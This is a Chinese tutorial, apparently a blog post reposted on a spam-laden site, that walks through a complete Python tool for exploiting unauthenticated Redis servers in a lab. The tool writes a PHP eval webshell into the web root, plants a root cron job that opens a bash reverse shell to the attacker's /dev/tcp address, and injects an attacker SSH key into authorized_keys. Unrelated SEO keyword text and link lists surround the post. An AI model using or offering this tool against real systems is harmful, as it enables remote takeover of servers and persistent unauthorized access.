当前位置: 首页 > news >正文

网站搬家图片怎么做营销师是做什么的

网站搬家图片怎么做,营销师是做什么的,衡东网站定制,公众号文章到wordpress之前介绍过Redis未授权访问漏洞#xff0c;本文使用python实现Redis未授权访问检测以及对应三种getshell。 1 测试环境准备 CentOS 7#xff08;192.168.198.66/24#xff09;#xff1a;安装 Redis 服务器并用 root 权限开启服务#xff0c;关闭保护模式#xff1b;安… 之前介绍过Redis未授权访问漏洞本文使用python实现Redis未授权访问检测以及对应三种getshell。 1 测试环境准备 CentOS 7192.168.198.66/24安装 Redis 服务器并用 root 权限开启服务关闭保护模式安装并开启 httpd 服务开启 ssh 服务。 Kali192.168.198.172/24测试脚本效果模拟攻击机。 Win10VS Code开发脚本Xshell控制虚拟机。 2 未授权访问检测 首先需要检测 6379 端口是否开启直接使用 socket 连接测试即可is_port_open() 函数实现检测端口开启情况。 def is_port_open(host,port):ssocket.socket()s.settimeout(0.3)try:s.connect((host,port))except Exception as e:return Falseelse:return Truefinally:s.close() 然后尝试连接 Redis 服务器这里用到redis模块中的StrictRedis(host,port,socket_timeout)通过client_list() 方法获取客户列表查看是否连接成功。如果成功连接到 Redis 服务器 client_list() 的调用就不会抛出异常。 try:client redis.StrictRedis(hostip, portport, socket_timeout0.3)ok_lst client.client_list()print([] Connected to the Redis server successfully...) except Exception as e:print(f[-] An unexpected error occurred: {e})3 写入webshell Redis命令 config set dir /var/www/html config set dbfilename shell.php set x ?php eval($_POST[123]); ? save 对应的 redis 模块的方法 client.config_set(dir,/var/www/html) client.config_set(dbfilename,shell.php) client.set(x,?php eval($_POST[123]); ?) client.save() 增加设置根目录一句话木马名称和密码功能 def Webshell(client):try:df_dir/var/www/htmlweb_dirinput(Please enter the root directory of the target machine\s website, input nothing to use the default path: /var/www/html\n)web_dirweb_dir.strip()if not web_dir: web_dirdf_dirnameinput(Please enter the name of the PHP file you want to upload: )passwdinput(Please enter the connection password: )client.config_set(dir,web_dir)client.config_set(dbfilename,name.php)client.set(x,?php eval($_POST[passwd]); ?)client.save()print([] Webshell name.php uploaded successfully...)except Exception as e:print(f[-] Webshell upload failed: {e}) 4 建立反弹连接 同理这里利用定时任务实现反弹连接。先设置 Redis 数据库目录到系统定时任务目录名字设置为 root 相当于修改 root 用户的定时任务增加用户设定 IP 和端口监听功能。 def Reverse(client):try:client.config_set(dir,/var/spool/cron)client.config_set(dbfilename,root)ipinput(Set the attacker\s IP address: )portinput(Set the listening port: )payload\n* * * * * bash -i /dev/tcp/ip/port 01\nclient.set(x,payload)client.save()print([] Reverse shell task created successfully...)except Exception as e:print(f[-] Reverse shell creation failed: {e}) 5 SSH keys 免密登录 把 Redis 的目录设置为 /root/.ssh保存文件为 authorized_keys实现在靶机中 authorized_keys 写入攻击者 ssh 公钥。 def Ssh(client):try:sshkeyinput(Enter the SSH key you have generated: )client.config_set(dir,/root/.ssh)client.config_set(dbfilename,authorized_keys)client.set(x,\n\nsshkey\n\n)client.save()print([] SSH key injected successfully.)except Exception as e:print(f[-] SSH key injection failed: {e}) 5 完整代码 import numpy as np import socket import redis import sys def Hello_FK_Redis():a,b60,30x,y,r30,15,13imgnp.zeros((b,a),dtypestr)for i in range(b):for j in range(a):distnp.sqrt((i-y)**2(j-x)**2)if r-1distr1: img[i,j]*elif abs(j-x)1 and distr: img[i,j]|elif abs(i-y)1 and distr: img[i,j]-img[img] for i in img: print(.join(i))print(----Welcome to use Redis Vulnerability Exploitation Tool----) def is_port_open(host,port):ssocket.socket()s.settimeout(0.3)try:s.connect((host,port))except Exception as e:return Falseelse:return Truefinally:s.close() def Webshell(client):try:df_dir/var/www/htmlweb_dirinput(Please enter the root directory of the target machine\s website, input nothing to use the default path: /var/www/html\n)web_dirweb_dir.strip()if not web_dir: web_dirdf_dirnameinput(Please enter the name of the PHP file you want to upload: )passwdinput(Please enter the connection password: )client.config_set(dir,web_dir)client.config_set(dbfilename,name.php)client.set(x,?php eval($_POST[passwd]); ?)client.save()print([] Webshell name.php uploaded successfully...)except Exception as e:print(f[-] Webshell upload failed: {e})def Reverse(client):try:client.config_set(dir,/var/spool/cron)client.config_set(dbfilename,root)ipinput(Set the attacker\s IP address: )portinput(Set the listening port: )ipip.strip()portport.strip()payload\n* * * * * bash -i /dev/tcp/ip/port 01\nclient.set(x,payload)client.save()print([] Reverse shell task created successfully...)except Exception as e:print(f[-] Reverse shell creation failed: {e}) def Ssh(client):try:sshkeyinput(Enter the SSH key you have generated: )client.config_set(dir,/root/.ssh)client.config_set(dbfilename,authorized_keys)client.set(x,\n\nsshkey\n\n)client.save()print([] SSH key injected successfully.)except Exception as e:print(f[-] SSH key injection failed: {e}) if __name__ __main__:Hello_FK_Redis()ipinput(Please enter the target machine\s IP address: )port6379if is_port_open(ip,port):print([] Port 6379 is open...)print([*] Trying to connect Redis server...)try:clientredis.StrictRedis(hostip,portport,socket_timeout0.3)ok_lstclient.client_list()print([] Connected to the Redis server successfully...)print(Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...)try:cint(input())if c1: Webshell(client)elif c2: Reverse(client)elif c3: Ssh(client)else: print([*] Exiting...)sys.exit()except Exception:print([*] Exiting...)sys.exit()except Exception as e:print(f[-] An unexpected error occurred: {e})else:print([-] Port 6379 is not open...) 6 测试效果 webshell 反弹连接 监听端口7777 下面输入攻击机端口保证与监听的攻击机和端口一致 免密登录 在 kali 中 .ssh 复制公钥 id_rsa.pub 的内容 免密登录
http://www.dnsts.com.cn/news/40268.html

相关文章:

  • 应聘网站开发题目商务网页设计与制作 百度百科
  • 烟台网站推广优化怎么在网站做推广
  • 公司网站做首页大图宝安沙井邮政编码
  • 网站开发职务山西建设网官方网站
  • 怎么免费永久创建网站无广告长沙商城网站建设报价公示
  • 网站建设学费多少钱网站建设合伙合同
  • 邯郸网站设计注册网页怎么做网站地图
  • 晋城市公用事业建设局网站中国建设工程信息网招标公告
  • 深圳专业建站平台seo交流论坛
  • 网站维护正常要多久广州番禺营销型网站
  • 华为企业网站建设需求分析网站建设报价比较
  • 外贸wap网站app网站建设思路
  • 好用的网站建设工具美摄短视频sdk
  • 网站购物系统制作雨辰资讯电子商务类网站开发淘客网站建设
  • 网站跟域名是什么关系工业设计专业最好的大学
  • tap自助建站昆明seo排名
  • 没有网站可以做网络推广吗电子商务网站开发系统
  • wordpress 书籍商丘做网站优化
  • 网站版权该怎么做呢巴中网站制作公司
  • 做房产的一般用哪个网站好网站做轮播图的意义
  • 怎么用phpcmf做网站网站后台 js框架
  • 重庆网站建站一站式服务淄博网络优化哪家专业
  • 优酷网站怎么做的施工企业会计分录
  • 给企业做网站的平台官方网站建设的目标
  • 台州网站设计公司网站北京云建站模板
  • 湛江仿站定制模板建站海南省建设局网站搜索
  • 岚县网站建设建设公众号网站
  • jsp做的网站建网站的公司怎么样
  • 邢台seo一站式wordpress time
  • 邢台建设厅网站有限责任公司注册资本最低限额